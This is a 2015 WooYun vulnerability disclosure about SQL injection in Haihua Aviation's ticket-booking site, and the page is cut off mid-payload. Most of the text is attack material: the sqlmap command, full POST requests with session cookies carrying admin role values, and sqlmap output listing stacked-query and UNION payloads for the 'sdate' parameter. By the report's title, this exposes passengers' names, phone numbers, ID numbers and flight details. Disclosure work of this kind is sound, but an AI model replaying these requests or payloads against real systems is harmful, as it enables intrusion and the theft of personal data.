当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120629

漏洞标题:海华航空存在两处SQL注入泄露大量订单信息(姓名、手机、证件号、航班号和起飞时间等)

相关厂商:北京海华航空服务有限公司

漏洞作者: missy

提交时间:2015-06-15 15:25

修复时间:2015-09-17 17:20

公开时间:2015-09-17 17:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-15: 细节已通知厂商并且等待厂商处理中
2015-06-19: 厂商已经确认,细节仅向厂商公开
2015-06-22: 细节向第三方安全合作伙伴开放
2015-08-13: 细节向核心白帽子及相关领域专家公开
2015-08-23: 细节向普通白帽子公开
2015-09-02: 细节向实习白帽子公开
2015-09-17: 细节向公众公开

简要描述:

SQL注入支持UNION

详细说明:

关键字:技术支持:盛代科技-票友软件


http://www.piaoyou.org/case_web.htm 票友软件的case


需要登录,先注册一个账号即可。


sqlmap.py -r 1.txt --time-sec=10 -p sdate


案例一:http://www.h-h.com.cn


POST注入:

POST /Financial/fksq_meb.aspx HTTP/1.1
Host: www.h-h.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.h-h.com.cn/Financial/fksq_meb.aspx
Cookie: ASP.NET_SessionId=j4mez4nqemur1p5awzc5vw1r; tktcookie=memberid=717&truename=qwueiuqwe&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3728
__VIEWSTATE=%2FwEPDwUJODA2NDEzMjQ3D2QWAgIDD2QWBgIBD2QWDAIDDw8WAh4EVGV4dAUJcXd1ZWl1cXdlZGQCBQ8PFgIfAAUMMDEwLTUxNjYyMzU1ZGQCBw8WAh4HVmlzaWJsZWcWAgIBDw8WAh8ABQ1BZG1pbmlzdHJhdG9yZGQCCQ8PFgQeC05hdmlnYXRlVXJsBRR%2BL1N5c3RlbS9teWluZm8uYXNweB8ABQzmiJHnmoTkv6Hmga9kZAILDw8WBB8CBRJ%2BL21lbWJlci9leGl0LmFzcHgfAAUM5a6J5YWo6YCA5Ye6ZGQCDQ8WAh8ABa4PPGxpPjxhIGhyZWY9IiMiPuezu%2Be7n%2BeuoeeQhjwvYT48aSBjbGFzcz0iaWNvMDIiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvU3lzdGVtL215aW5mby5hc3B4Ij7CtyDkvIHkuJrkv6Hmga88L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL21lbWJlci9Hcm91cC5hc3B4Ij7CtyDpg6jpl6jliIbnu4Q8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL21lbWJlci9GbGFnLmFzcHgiPsK3IOinkuiJsuadg%2BmZkDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL1BlcnNvbm5lbC5hc3B4Ij7CtyDlkZjlt6XnrqHnkIY8L2E%2BPC9saT48L3VsPjwvbGk%2BPGxpPjxhIGhyZWY9IiMiPuW3ruaXhemihOWumjwvYT48aSBjbGFzcz0iaWNvMDMiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvRmxpZ2h0LyI%2Bwrcg5Zu95YaF5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9GbGlnaHRfaW50L2dqdGlja2V0cy5hc3B4Ij7CtyDlm73pmYXmnLrnpag8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0hvdGVsLyI%2Bwrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9UcmFpbi8iPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B6K6i5Y2V5p%2Bl6K%2BiPC9hPjxpIGNsYXNzPSJpY28wNCI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9PcmRlci9mbGlnaHQuYXNweCI%2Bwrcg6aOe5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9PcmRlci9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL09yZGVyL3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvUmV0dXJuLmFzcHgiPsK3IOmAgOelqOiusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvc2NncV9saXN0LmFzcHgiPsK3IOWNh%2BiIseaUueacn%2BiusOW9lTwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B6K6i5Y2V5a6h5qC4PC9hPjxpIGNsYXNzPSJpY28wNSI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9DaGVjay9mbGlnaHQuYXNweCI%2Bwrcg6aOe5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9DaGVjay9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0NoZWNrL3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B5beu5peF5oql6KGoPC9hPjxpIGNsYXNzPSJpY28wNiI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3Zpc2EuYXNweCI%2Bwrcg562%2B6K%2BBPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvYnguYXNweCI%2Bwrcg5L%2Bd6ZmpPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvb3RoZXIuYXNweCI%2Bwrcg5YW25a6DPC9hPjwvbGk%2BPC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7otKLliqHnrqHnkIY8L2E%2BPGkgY2xhc3M9ImljbzA3Ij48L2k%2BPHVsIGNsYXNzPSJzdWItbmF2Ij48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9ma3NxX21lYi5hc3B4Ij7CtyDku5jmrL7nlLPor7forrDlvZU8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9wYXlfaGlzdG9yeS5hc3B4Ij7CtyDlt7Lku5jmrL7orrDlvZU8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9vcmRlcnNfYWxsLmFzcHgiPsK3IOe7vOWQiOe7n%2BiuoTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3hjZF9vcmRlcnMuYXNweCI%2Bwrcg6KGM56iL5Y2V5Lqk5o6lPC9hPjwvbGk%2BPC91bD48L2xpPmQCCw8WAh4LXyFJdGVtQ291bnRmZAIND2QWBgIBDw8WAh8ABV9Db3B5cmlnaHQgJmNvcHk7IDIwMTQgaGhjbC5oLWguY29tLmNuIGFsbCByaWdodHMgcmVzZXJ2ZWQuIOWMl%2BS6rOa1t%2BWNjuiIquepuuacjeWKoeaciemZkOWFrOWPuGRkAgMPDxYCHwAFMeWcsOWdgO%2B8muWMl%2BS6rOW4guS4nOWfjuWMuuWuieW%2Bt%2Bi3r%2BeUsjEw5Y%2B3NS0xMDVkZAIFDw8WAh8ABSvnlLXor53vvJowMTAtNTE2NjIzNTUg5Lyg55yf77yaMDEwLTUxNjY4NDUwZGRk4UujVOiCDJV2KQ5W5yFZ6G%2F3beyhOf%2FbYa5kUT9h2TE%3D&__EVENTVALIDATION=%2FwEWCgK9%2FauVBgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCeTSLOOzN%2Bp6XI9xcDsnWThoLwdkvHSo1F18f358pUJd&sdate=2015-6-15&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=717


1.jpg


2.jpg


0.jpg


第二处:

POST /Financial/fksq_meb.aspx HTTP/1.1
Host: www.h-h.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.h-h.com.cn/Financial/fksq_meb.aspx
Cookie: ASP.NET_SessionId=j4mez4nqemur1p5awzc5vw1r; tktcookie=memberid=717&truename=qwueiuqwe&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3728
__VIEWSTATE=%2FwEPDwUJODA2NDEzMjQ3D2QWAgIDD2QWBgIBD2QWDAIDDw8WAh4EVGV4dAUJcXd1ZWl1cXdlZGQCBQ8PFgIfAAUMMDEwLTUxNjYyMzU1ZGQCBw8WAh4HVmlzaWJsZWcWAgIBDw8WAh8ABQ1BZG1pbmlzdHJhdG9yZGQCCQ8PFgQeC05hdmlnYXRlVXJsBRR%2BL1N5c3RlbS9teWluZm8uYXNweB8ABQzmiJHnmoTkv6Hmga9kZAILDw8WBB8CBRJ%2BL21lbWJlci9leGl0LmFzcHgfAAUM5a6J5YWo6YCA5Ye6ZGQCDQ8WAh8ABa4PPGxpPjxhIGhyZWY9IiMiPuezu%2Be7n%2BeuoeeQhjwvYT48aSBjbGFzcz0iaWNvMDIiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvU3lzdGVtL215aW5mby5hc3B4Ij7CtyDkvIHkuJrkv6Hmga88L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL21lbWJlci9Hcm91cC5hc3B4Ij7CtyDpg6jpl6jliIbnu4Q8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL21lbWJlci9GbGFnLmFzcHgiPsK3IOinkuiJsuadg%2BmZkDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL1BlcnNvbm5lbC5hc3B4Ij7CtyDlkZjlt6XnrqHnkIY8L2E%2BPC9saT48L3VsPjwvbGk%2BPGxpPjxhIGhyZWY9IiMiPuW3ruaXhemihOWumjwvYT48aSBjbGFzcz0iaWNvMDMiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvRmxpZ2h0LyI%2Bwrcg5Zu95YaF5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9GbGlnaHRfaW50L2dqdGlja2V0cy5hc3B4Ij7CtyDlm73pmYXmnLrnpag8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0hvdGVsLyI%2Bwrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9UcmFpbi8iPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B6K6i5Y2V5p%2Bl6K%2BiPC9hPjxpIGNsYXNzPSJpY28wNCI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9PcmRlci9mbGlnaHQuYXNweCI%2Bwrcg6aOe5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9PcmRlci9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL09yZGVyL3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvUmV0dXJuLmFzcHgiPsK3IOmAgOelqOiusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvc2NncV9saXN0LmFzcHgiPsK3IOWNh%2BiIseaUueacn%2BiusOW9lTwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B6K6i5Y2V5a6h5qC4PC9hPjxpIGNsYXNzPSJpY28wNSI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9DaGVjay9mbGlnaHQuYXNweCI%2Bwrcg6aOe5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9DaGVjay9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0NoZWNrL3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B5beu5peF5oql6KGoPC9hPjxpIGNsYXNzPSJpY28wNiI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3Zpc2EuYXNweCI%2Bwrcg562%2B6K%2BBPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvYnguYXNweCI%2Bwrcg5L%2Bd6ZmpPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvb3RoZXIuYXNweCI%2Bwrcg5YW25a6DPC9hPjwvbGk%2BPC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7otKLliqHnrqHnkIY8L2E%2BPGkgY2xhc3M9ImljbzA3Ij48L2k%2BPHVsIGNsYXNzPSJzdWItbmF2Ij48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9ma3NxX21lYi5hc3B4Ij7CtyDku5jmrL7nlLPor7forrDlvZU8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9wYXlfaGlzdG9yeS5hc3B4Ij7CtyDlt7Lku5jmrL7orrDlvZU8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9vcmRlcnNfYWxsLmFzcHgiPsK3IOe7vOWQiOe7n%2BiuoTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3hjZF9vcmRlcnMuYXNweCI%2Bwrcg6KGM56iL5Y2V5Lqk5o6lPC9hPjwvbGk%2BPC91bD48L2xpPmQCCw8WAh4LXyFJdGVtQ291bnRmZAIND2QWBgIBDw8WAh8ABV9Db3B5cmlnaHQgJmNvcHk7IDIwMTQgaGhjbC5oLWguY29tLmNuIGFsbCByaWdodHMgcmVzZXJ2ZWQuIOWMl%2BS6rOa1t%2BWNjuiIquepuuacjeWKoeaciemZkOWFrOWPuGRkAgMPDxYCHwAFMeWcsOWdgO%2B8muWMl%2BS6rOW4guS4nOWfjuWMuuWuieW%2Bt%2Bi3r%2BeUsjEw5Y%2B3NS0xMDVkZAIFDw8WAh8ABSvnlLXor53vvJowMTAtNTE2NjIzNTUg5Lyg55yf77yaMDEwLTUxNjY4NDUwZGRk4UujVOiCDJV2KQ5W5yFZ6G%2F3beyhOf%2FbYa5kUT9h2TE%3D&__EVENTVALIDATION=%2FwEWCgK9%2FauVBgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCeTSLOOzN%2Bp6XI9xcDsnWThoLwdkvHSo1F18f358pUJd&sdate=2015-6-15&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=717


3.jpg


4.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sdate (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=/wEPDwUJODA2NDEzMjQ3D2QWAgIDD2QWBgIBD2QWDAIDDw8WAh4EVGV4dAUJcXd1ZWl1cXdlZGQCBQ8PFgIfAAUMMDEwLTUxNjYyMzU1ZGQCBw8WAh4HVmlzaWJsZWcWAgIBDw8WAh8ABQ1BZG1pbmlzdHJhdG9yZGQCCQ8PFgQeC05hdmlnYXRlVXJsBRR+L1N5c3RlbS9teWluZm8uYXNweB8ABQzmiJHnmoTkv6Hmga9kZAILDw8WBB8CBRJ+L21lbWJlci9leGl0LmFzcHgfAAUM5a6J5YWo6YCA5Ye6ZGQCDQ8WAh8ABa4PPGxpPjxhIGhyZWY9IiMiPuezu+e7n+euoeeQhjwvYT48aSBjbGFzcz0iaWNvMDIiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvU3lzdGVtL215aW5mby5hc3B4Ij7CtyDkvIHkuJrkv6Hmga88L2E+PC9saT48bGk+PGEgaHJlZj0iL21lbWJlci9Hcm91cC5hc3B4Ij7CtyDpg6jpl6jliIbnu4Q8L2E+PC9saT48bGk+PGEgaHJlZj0iL21lbWJlci9GbGFnLmFzcHgiPsK3IOinkuiJsuadg+mZkDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL1BlcnNvbm5lbC5hc3B4Ij7CtyDlkZjlt6XnrqHnkIY8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuW3ruaXhemihOWumjwvYT48aSBjbGFzcz0iaWNvMDMiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvRmxpZ2h0LyI+wrcg5Zu95YaF5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GbGlnaHRfaW50L2dqdGlja2V0cy5hc3B4Ij7CtyDlm73pmYXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0hvdGVsLyI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9UcmFpbi8iPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5p+l6K+iPC9hPjxpIGNsYXNzPSJpY28wNCI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9PcmRlci9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvUmV0dXJuLmFzcHgiPsK3IOmAgOelqOiusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvc2NncV9saXN0LmFzcHgiPsK3IOWNh+iIseaUueacn+iusOW9lTwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5a6h5qC4PC9hPjxpIGNsYXNzPSJpY28wNSI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9DaGVjay9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9DaGVjay9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL0NoZWNrL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF5oql6KGoPC9hPjxpIGNsYXNzPSJpY28wNiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3Zpc2EuYXNweCI+wrcg562+6K+BPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvYnguYXNweCI+wrcg5L+d6ZmpPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvb3RoZXIuYXNweCI+wrcg5YW25a6DPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7otKLliqHnrqHnkIY8L2E+PGkgY2xhc3M9ImljbzA3Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9ma3NxX21lYi5hc3B4Ij7CtyDku5jmrL7nlLPor7forrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9wYXlfaGlzdG9yeS5hc3B4Ij7CtyDlt7Lku5jmrL7orrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9vcmRlcnNfYWxsLmFzcHgiPsK3IOe7vOWQiOe7n+iuoTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3hjZF9vcmRlcnMuYXNweCI+wrcg6KGM56iL5Y2V5Lqk5o6lPC9hPjwvbGk+PC91bD48L2xpPmQCCw8WAh4LXyFJdGVtQ291bnRmZAIND2QWBgIBDw8WAh8ABV9Db3B5cmlnaHQgJmNvcHk7IDIwMTQgaGhjbC5oLWguY29tLmNuIGFsbCByaWdodHMgcmVzZXJ2ZWQuIOWMl+S6rOa1t+WNjuiIquepuuacjeWKoeaciemZkOWFrOWPuGRkAgMPDxYCHwAFMeWcsOWdgO+8muWMl+S6rOW4guS4nOWfjuWMuuWuieW+t+i3r+eUsjEw5Y+3NS0xMDVkZAIFDw8WAh8ABSvnlLXor53vvJowMTAtNTE2NjIzNTUg5Lyg55yf77yaMDEwLTUxNjY4NDUwZGRk4UujVOiCDJV2KQ5W5yFZ6G/3beyhOf/bYa5kUT9h2TE=&__EVENTVALIDATION=/wEWCgK9/auVBgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCeTSLOOzN+p6XI9xcDsnWThoLwdkvHSo1F18f358pUJd&sdate=2015-6-15');WAITFOR DELAY '0:0:5'--&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=717
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: __VIEWSTATE=/wEPDwUJODA2NDEzMjQ3D2QWAgIDD2QWBgIBD2QWDAIDDw8WAh4EVGV4dAUJcXd1ZWl1cXdlZGQCBQ8PFgIfAAUMMDEwLTUxNjYyMzU1ZGQCBw8WAh4HVmlzaWJsZWcWAgIBDw8WAh8ABQ1BZG1pbmlzdHJhdG9yZGQCCQ8PFgQeC05hdmlnYXRlVXJsBRR+L1N5c3RlbS9teWluZm8uYXNweB8ABQzmiJHnmoTkv6Hmga9kZAILDw8WBB8CBRJ+L21lbWJlci9leGl0LmFzcHgfAAUM5a6J5YWo6YCA5Ye6ZGQCDQ8WAh8ABa4PPGxpPjxhIGhyZWY9IiMiPuezu+e7n+euoeeQhjwvYT48aSBjbGFzcz0iaWNvMDIiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvU3lzdGVtL215aW5mby5hc3B4Ij7CtyDkvIHkuJrkv6Hmga88L2E+PC9saT48bGk+PGEgaHJlZj0iL21lbWJlci9Hcm91cC5hc3B4Ij7CtyDpg6jpl6jliIbnu4Q8L2E+PC9saT48bGk+PGEgaHJlZj0iL21lbWJlci9GbGFnLmFzcHgiPsK3IOinkuiJsuadg+mZkDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL1BlcnNvbm5lbC5hc3B4Ij7CtyDlkZjlt6XnrqHnkIY8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuW3ruaXhemihOWumjwvYT48aSBjbGFzcz0iaWNvMDMiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvRmxpZ2h0LyI+wrcg5Zu95YaF5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GbGlnaHRfaW50L2dqdGlja2V0cy5hc3B4Ij7CtyDlm73pmYXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0hvdGVsLyI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9UcmFpbi8iPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5p+l6K+iPC9hPjxpIGNsYXNzPSJpY28wNCI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9PcmRlci9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvUmV0dXJuLmFzcHgiPsK3IOmAgOelqOiusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvc2NncV9saXN0LmFzcHgiPsK3IOWNh+iIseaUueacn+iusOW9lTwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5a6h5qC4PC9hPjxpIGNsYXNzPSJpY28wNSI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9DaGVjay9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9DaGVjay9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL0NoZWNrL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF5oql6KGoPC9hPjxpIGNsYXNzPSJpY28wNiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3Zpc2EuYXNweCI+wrcg562+6K+BPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvYnguYXNweCI+wrcg5L+d6ZmpPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvb3RoZXIuYXNweCI+wrcg5YW25a6DPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7otKLliqHnrqHnkIY8L2E+PGkgY2xhc3M9ImljbzA3Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9ma3NxX21lYi5hc3B4Ij7CtyDku5jmrL7nlLPor7forrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9wYXlfaGlzdG9yeS5hc3B4Ij7CtyDlt7Lku5jmrL7orrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9vcmRlcnNfYWxsLmFzcHgiPsK3IOe7vOWQiOe7n+iuoTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3hjZF9vcmRlcnMuYXNweCI+wrcg6KGM56iL5Y2V5Lqk5o6lPC9hPjwvbGk+PC91bD48L2xpPmQCCw8WAh4LXyF